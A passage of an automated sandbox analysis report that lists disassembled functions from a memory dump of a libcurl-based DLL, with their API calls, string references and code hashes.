                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_maprintf$curl_mvaprintf
                                                                                                                                            • String ID: %s auth using %s with user '%s'$%s:%s$%sAuthorization: Basic %s$Authorization$Authorization:$Authorization: Bearer %s$Basic$Bearer$Digest$NTLM$Negotiate$Proxy$Proxy-$Proxy-authorization$Server
                                                                                                                                            • API String ID: 3491783128-3980008082
                                                                                                                                            • Opcode ID: 642e4ac7ad2979dc1d6c9673bd01d0a3c71a3bc6c1109abcfe79eae5ceb94103
                                                                                                                                            • Instruction ID: 3fe8a5e07db2483b616973e9644286e036c9cc86910ec50c65129b1a03b603a2
                                                                                                                                            • Opcode Fuzzy Hash: 642e4ac7ad2979dc1d6c9673bd01d0a3c71a3bc6c1109abcfe79eae5ceb94103
                                                                                                                                            • Instruction Fuzzy Hash: 3C81D671E44104ABDB018F68DA45BAEB7A8EF45395F0581BAFC08DB201D33ADD51CBA5
                                                                                                                                            Function 6B78B5C0 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 205COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • curl_strnequal.LIBCURL(Negotiate,?,00000009,00000000,?,?,?,00000000), ref: 6B78B61C
                                                                                                                                            • curl_strnequal.LIBCURL(NTLM,?,00000004,00000000,?,?,?,00000000), ref: 6B78B6A0
                                                                                                                                            • curl_strnequal.LIBCURL(Digest,?,00000006,?,?,?,00000000,?,?,?,00000000), ref: 6B78B704
                                                                                                                                            • curl_strnequal.LIBCURL(Basic,?,00000005,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 6B78B75D
                                                                                                                                              • Part of subcall function 6B7A06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lyk), ref: 6B7A06EF
                                                                                                                                              • Part of subcall function 6B7A06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B7A072F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_strnequal$curl_msnprintfcurl_mvsnprintf
                                                                                                                                            • String ID: Authentication problem. Ignoring this.$Basic$Bearer$Digest$Ignoring duplicate digest auth header.$NTLM$Negotiate$t!
                                                                                                                                            • API String ID: 4236074386-280430007
                                                                                                                                            • Opcode ID: 532affa283a59941c707b2af37ec1c8cb0f65403d54e98a1baf0ce41deb933a1
                                                                                                                                            • Instruction ID: 488b7091153d0d7fafaff56e771e89b5ddb67c91a2f8e0a59a6e5cf79fbe22c0
                                                                                                                                            • Opcode Fuzzy Hash: 532affa283a59941c707b2af37ec1c8cb0f65403d54e98a1baf0ce41deb933a1
                                                                                                                                            • Instruction Fuzzy Hash: D8613A34904305ABDB008E65DF4578E7BE59F42358F1480B6FCA99B342E73BE565CBA0
                                                                                                                                            Function 6B7AE810 Relevance: 21.3, APIs: 3, Strings: 9, Instructions: 288COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 6B7A06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lyk), ref: 6B7A06EF
                                                                                                                                              • Part of subcall function 6B7A06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B7A072F
                                                                                                                                            • curl_slist_free_all.LIBCURL(00000000,?,?,?,?,?,?,?,?,?,Moving trailers state machine from initialized to sending.,?,?,?), ref: 6B7AE994
                                                                                                                                              • Part of subcall function 6B78B530: ___from_strstr_to_strchr.LIBCMT ref: 6B78B55B
                                                                                                                                            • curl_slist_free_all.LIBCURL(00000000,?,Successfully compiled trailers.,?,?,?,?,?,?,?,?,?,Moving trailers state machine from initialized to sending.,?,?,?), ref: 6B7AE8CD
                                                                                                                                            • curl_msnprintf.LIBCURL(?,0000000B,%zx%s,?,6B7DBF70), ref: 6B7AEAC6
                                                                                                                                              • Part of subcall function 6B7A05D0: curl_mvsnprintf.LIBCURL(?,00000100,6B79C830,?), ref: 6B7A0610
                                                                                                                                            Strings
                                                                                                                                            • read function returned funny value, xrefs: 6B7AEA35
                                                                                                                                            • operation aborted by callback, xrefs: 6B7AE945
                                                                                                                                            • Successfully compiled trailers., xrefs: 6B7AE8BF
                                                                                                                                            • Signaling end of chunked upload after trailers., xrefs: 6B7AEBBE
                                                                                                                                            • operation aborted by trailing headers callback, xrefs: 6B7AE96F
                                                                                                                                            • Signaling end of chunked upload via terminating chunk., xrefs: 6B7AEB1B
                                                                                                                                            • Moving trailers state machine from initialized to sending., xrefs: 6B7AE842
                                                                                                                                            • Read callback asked for PAUSE when not supported!, xrefs: 6B7AE9DC
                                                                                                                                            • %zx%s, xrefs: 6B7AEAA9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_msnprintfcurl_mvsnprintfcurl_slist_free_all$___from_strstr_to_strchr
                                                                                                                                            • String ID: %zx%s$Moving trailers state machine from initialized to sending.$Read callback asked for PAUSE when not supported!$Signaling end of chunked upload after trailers.$Signaling end of chunked upload via terminating chunk.$Successfully compiled trailers.$operation aborted by callback$operation aborted by trailing headers callback$read function returned funny value
                                                                                                                                            • API String ID: 2651734479-586909597
                                                                                                                                            • Opcode ID: 5a4aa2f3713d083ae6bf0c5e8298d6a7eb799032b4ca0d193b14b942e2647ea6
                                                                                                                                            • Instruction ID: 2fd349d7a4e3bd0b68c428f6b6d92247e5772ac5013598b102213aeddc71382f
                                                                                                                                            • Opcode Fuzzy Hash: 5a4aa2f3713d083ae6bf0c5e8298d6a7eb799032b4ca0d193b14b942e2647ea6
                                                                                                                                            • Instruction Fuzzy Hash: B9A11971E04209ABDB44CF74D99ABEEFBB4EF05318F100269F819A7280D77D25958BE1
                                                                                                                                            Function 6B77B160 Relevance: 21.3, APIs: 14, Instructions: 267COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 6B7927F0: curl_slist_free_all.LIBCURL(?,?), ref: 6B792801
                                                                                                                                              • Part of subcall function 6B7927F0: curl_slist_free_all.LIBCURL(?), ref: 6B792812
                                                                                                                                            • curl_mime_init.LIBCURL(?), ref: 6B77B187
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_slist_free_all$curl_mime_init
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2112604817-0
                                                                                                                                            • Opcode ID: c55c96c048746ae4235705df83b12e092d5d20887ffc6fa75dc8f7bb62228f08
                                                                                                                                            • Instruction ID: cc9a6a58afd2e77261ace391b2eb3d09a5f91ee0585464866924fa5c944fd964
                                                                                                                                            • Opcode Fuzzy Hash: c55c96c048746ae4235705df83b12e092d5d20887ffc6fa75dc8f7bb62228f08
                                                                                                                                            • Instruction Fuzzy Hash: 54812372E05615ABCF31AA64AE66B9E77A8EF04324F0502B4FC18A7341E72DFD5083D1
                                                                                                                                            Function 6B7D5D4F Relevance: 19.6, APIs: 13, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 6B7D5D6C
                                                                                                                                              • Part of subcall function 6B7CF7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B7D5EE0,6B7F38A0,00000000,6B7F38A0,00000000,?,6B7D5F07,6B7F38A0,00000007,6B7F38A0,?,6B7D532A,6B7F38A0), ref: 6B7CF800
                                                                                                                                              • Part of subcall function 6B7CF7EA: GetLastError.KERNEL32(6B7F38A0,?,6B7D5EE0,6B7F38A0,00000000,6B7F38A0,00000000,?,6B7D5F07,6B7F38A0,00000007,6B7F38A0,?,6B7D532A,6B7F38A0,6B7F38A0), ref: 6B7CF812
                                                                                                                                            • _free.LIBCMT ref: 6B7D5D7E
                                                                                                                                            • _free.LIBCMT ref: 6B7D5D90
                                                                                                                                            • _free.LIBCMT ref: 6B7D5DA2
                                                                                                                                            • _free.LIBCMT ref: 6B7D5DB4
                                                                                                                                            • _free.LIBCMT ref: 6B7D5DC6
                                                                                                                                            • _free.LIBCMT ref: 6B7D5DD8
                                                                                                                                            • _free.LIBCMT ref: 6B7D5DEA
                                                                                                                                            • _free.LIBCMT ref: 6B7D5DFC
                                                                                                                                            • _free.LIBCMT ref: 6B7D5E0E
                                                                                                                                            • _free.LIBCMT ref: 6B7D5E20
                                                                                                                                            • _free.LIBCMT ref: 6B7D5E32
                                                                                                                                            • _free.LIBCMT ref: 6B7D5E44
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 46efe5b3ca2eab215293cdec72c99cfd784c7ff5eb69b0c15634db775c1a4452
                                                                                                                                            • Instruction ID: 14d1fbe1429216c2a56b88a64d546f7cd1e9369d5b517401fcb4ffa083a2ee4b
                                                                                                                                            • Opcode Fuzzy Hash: 46efe5b3ca2eab215293cdec72c99cfd784c7ff5eb69b0c15634db775c1a4452
                                                                                                                                            • Instruction Fuzzy Hash: C121F7315046449F9B18DF78F6DAD1F73F9FA063943A0086EF569DB540DB38F8848A68
                                                                                                                                            Function 6B7AACC0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 141libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,?,00000002,6B7AAEAE), ref: 6B7AACCE
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 6B7AACE8
                                                                                                                                            • _strpbrk.LIBCMT ref: 6B7AACFC
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc_strpbrk
                                                                                                                                            • String ID: AddDllDirectory$LoadLibraryExA$kernel32
                                                                                                                                            • API String ID: 1657965159-3327535076
                                                                                                                                            • Opcode ID: 003c6f5c65cab84d4f9946ebbb62958475896aa83bc968491fd1934cf4162902
                                                                                                                                            • Instruction ID: 52afe4d1fb9ea533ac9ff9b189414918711119e693b6a5dd699c983bd38220c7
                                                                                                                                            • Opcode Fuzzy Hash: 003c6f5c65cab84d4f9946ebbb62958475896aa83bc968491fd1934cf4162902
                                                                                                                                            • Instruction Fuzzy Hash: 1C413832704301ABEF014E78AD44BAEB768EF82256F1042FAFC85D7345EA77D50697A0
                                                                                                                                            Function 6B7D5193 Relevance: 18.1, APIs: 12, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 6B7D51CC
                                                                                                                                              • Part of subcall function 6B7CF7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B7D5EE0,6B7F38A0,00000000,6B7F38A0,00000000,?,6B7D5F07,6B7F38A0,00000007,6B7F38A0,?,6B7D532A,6B7F38A0), ref: 6B7CF800
                                                                                                                                              • Part of subcall function 6B7CF7EA: GetLastError.KERNEL32(6B7F38A0,?,6B7D5EE0,6B7F38A0,00000000,6B7F38A0,00000000,?,6B7D5F07,6B7F38A0,00000007,6B7F38A0,?,6B7D532A,6B7F38A0,6B7F38A0), ref: 6B7CF812
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5D6C
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5D7E
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5D90
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5DA2
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5DB4
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5DC6
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5DD8
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5DEA
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5DFC
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5E0E
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5E20
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5E32
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5E44
                                                                                                                                            • _free.LIBCMT ref: 6B7D51EE
                                                                                                                                            • _free.LIBCMT ref: 6B7D5203
                                                                                                                                            • _free.LIBCMT ref: 6B7D520E
                                                                                                                                            • _free.LIBCMT ref: 6B7D5230
                                                                                                                                            • _free.LIBCMT ref: 6B7D5243
                                                                                                                                            • _free.LIBCMT ref: 6B7D5251
                                                                                                                                            • _free.LIBCMT ref: 6B7D525C
                                                                                                                                            • _free.LIBCMT ref: 6B7D5294
                                                                                                                                            • _free.LIBCMT ref: 6B7D529B
                                                                                                                                            • _free.LIBCMT ref: 6B7D52B8
                                                                                                                                            • _free.LIBCMT ref: 6B7D52D0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: d173043cf0caf4e2aabe297888cb66d7d8b9567558537c3d0964a34ca68b0c54
                                                                                                                                            • Instruction ID: d68e6a8a0c28b9918332e80b02e4607833f77abf31be8d1c11dc3fa159fdf97d
                                                                                                                                            • Opcode Fuzzy Hash: d173043cf0caf4e2aabe297888cb66d7d8b9567558537c3d0964a34ca68b0c54
                                                                                                                                            • Instruction Fuzzy Hash: A83139716042009FEB159B78EA89B4F73E9FF01394F6048AAF569DA150DB38F948CB21
                                                                                                                                            Function 6B7CD7CA Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 6B7CD46B: CreateFileW.KERNEL32(00000000,00000000,?,6B7CD873,?,?,00000000,?,6B7CD873,00000000,0000000C), ref: 6B7CD488
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B7CD8DE
                                                                                                                                            • __dosmaperr.LIBCMT ref: 6B7CD8E5
                                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 6B7CD8F1
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B7CD8FB
                                                                                                                                            • __dosmaperr.LIBCMT ref: 6B7CD904
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 6B7CD924
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 6B7CDA71
                                                                                                                                            • GetLastError.KERNEL32 ref: 6B7CDAA3
                                                                                                                                            • __dosmaperr.LIBCMT ref: 6B7CDAAA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                            • String ID: H
                                                                                                                                            • API String ID: 4237864984-2852464175
                                                                                                                                            • Opcode ID: f74be632f1ae5abdb9af131d99c85fc2f871e962d58fd2a0675b6def344888ee
                                                                                                                                            • Instruction ID: ef62104dbc36ab33d1bb8874b4cc57fc0a88ed0d8e3197df53331b63f3c17931
                                                                                                                                            • Opcode Fuzzy Hash: f74be632f1ae5abdb9af131d99c85fc2f871e962d58fd2a0675b6def344888ee
                                                                                                                                            • Instruction Fuzzy Hash: C4A13432A841149FCF189F78C9557AE3BE0AB4B324F1501ADF821AB390D738D902C75A
                                                                                                                                            Function 6B79D9D0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 144COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79DA0F
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79DA4D
                                                                                                                                            • curl_msnprintf.LIBCURL(6B781696,00000009,%2I64d:%02I64d:%02I64d,6B781696,?,00000000,?,?,6B781696,?,6B781696,0000003C,00000000,00000000,?,00000E10), ref: 6B79DAA5
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79DABD
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79DAF2
                                                                                                                                            • curl_msnprintf.LIBCURL(6B781696,00000009,%3I64dd %02I64dh,00000000,6B781696,00000000,?,?,6B781696,00000E10,00000000,00000000,?,00015180,00000000,?), ref: 6B79DB07
                                                                                                                                            • curl_msnprintf.LIBCURL(6B781696,00000009,%7I64dd,00000000,?,?,6B781696,00015180,00000000,?,6B781696,00000E10,00000000,?,6B781696,?), ref: 6B79DB22
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$curl_msnprintf
                                                                                                                                            • String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd
                                                                                                                                            • API String ID: 2752550610-564197712
                                                                                                                                            • Opcode ID: 9aef403fddd49f75e8c1175ecab1653da4ed636645f0edc1b9e0fcc8910e9e67
                                                                                                                                            • Instruction ID: 5ddb93ba4c89fe56e710ed283edf3b3d6b3483fb5b0fc07cad4233ed44993cd4
                                                                                                                                            • Opcode Fuzzy Hash: 9aef403fddd49f75e8c1175ecab1653da4ed636645f0edc1b9e0fcc8910e9e67
                                                                                                                                            • Instruction Fuzzy Hash: F0416873B402087AEB205E7CAD42FAFBBA9DB84754F010174FD08EB280EA79DD1142E4
                                                                                                                                            Function 6B771A20 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 322COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000005,%c%c%c%c,?,?,?,?), ref: 6B771B38
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000005,%c%c%c=,?,?,?), ref: 6B771B5D
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000005,%c%c==,?,?), ref: 6B771B79
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_msnprintf
                                                                                                                                            • String ID: %c%c%c%c$%c%c%c=$%c%c==$%ld%s
                                                                                                                                            • API String ID: 1809024409-1523555428
                                                                                                                                            • Opcode ID: 02d49fbc38c39be50e7d2a679689f6ff036e6bf9b5e81796a8feb0fb88a745b8
                                                                                                                                            • Instruction ID: 1b1d45e326cae68284283da1063238f2a902b1d88f6232c371ca681b1fb1bb71
                                                                                                                                            • Opcode Fuzzy Hash: 02d49fbc38c39be50e7d2a679689f6ff036e6bf9b5e81796a8feb0fb88a745b8
                                                                                                                                            • Instruction Fuzzy Hash: 2AB12C719042549FDB21DF68CD55BEA7BF8AF06304F0441F9F8A997242E738EA05CBA0
                                                                                                                                            Function 6B7AA0E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,00000100), ref: 6B7AA0E7
                                                                                                                                            • _strncpy.LIBCMT ref: 6B7AA12D
                                                                                                                                            • _strrchr.LIBCMT ref: 6B7AA16D
                                                                                                                                            • _strrchr.LIBCMT ref: 6B7AA188
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 6B7AA1B3
                                                                                                                                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 6B7AA1C1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$_strrchr$_strncpy
                                                                                                                                            • String ID: Unknown error %d (%#x)
                                                                                                                                            • API String ID: 1320708361-2414550090
                                                                                                                                            • Opcode ID: 7edcfbaa2f938c09204b34a410d41c97228738fc3fd64dbda43ee02298b3c6cc
                                                                                                                                            • Instruction ID: 336044138e579888dff26e81083e120ee2c39e0fcd7404580fd4bfb8175f88ad
                                                                                                                                            • Opcode Fuzzy Hash: 7edcfbaa2f938c09204b34a410d41c97228738fc3fd64dbda43ee02298b3c6cc
                                                                                                                                            • Instruction Fuzzy Hash: F621E174A00208BFDB411F75AE4AB6F7BBCDF9625AF0001B9FC0496241EB29D90183B2
                                                                                                                                            Function 6B7CE10C Relevance: 13.8, APIs: 9, Instructions: 301COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
